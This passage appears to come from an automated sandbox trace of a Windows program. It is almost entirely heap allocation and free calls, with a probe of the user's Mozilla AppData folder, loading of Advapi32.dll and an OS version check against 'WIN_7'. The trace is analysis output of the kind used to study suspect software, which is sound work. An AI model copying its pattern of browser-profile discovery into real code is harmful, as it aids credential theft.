(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0204.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0204.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0204.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0204.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0204.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0204.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0204.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0204.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0204.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0204.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0204.346] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0204.346] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Mozilla", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa880038, dwReserved1=0x18636, cFileName="Mozilla", cAlternateFileName="")) returned 0xaa5760 [0204.346] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0204.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0204.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0204.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0204.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0204.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.347] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0204.347] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0204.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0204.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0204.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0204.347] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0204.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0204.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0204.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0204.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0204.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0204.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0204.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0204.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0204.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0204.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0204.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0204.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0204.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0204.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.348] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.348] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0204.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.348] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0204.349] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0204.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0204.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0204.349] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0204.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0204.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0204.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0204.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0204.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0204.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0204.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.349] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0204.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0204.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0204.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.349] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.349] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0204.350] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0204.350] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0204.350] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0204.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f60 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0204.350] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0204.350] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0204.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0204.351] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0204.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0204.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0204.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0204.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0204.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0204.351] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0204.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0204.351] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0204.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0204.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0204.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0204.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0204.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0204.351] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0204.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0204.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0204.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0204.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.352] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.352] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.353] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.353] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.353] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0204.353] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.353] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0204.353] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0204.354] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0204.354] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0204.354] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0204.354] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.355] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.355] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0204.355] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0204.356] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.356] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0204.356] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0204.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", 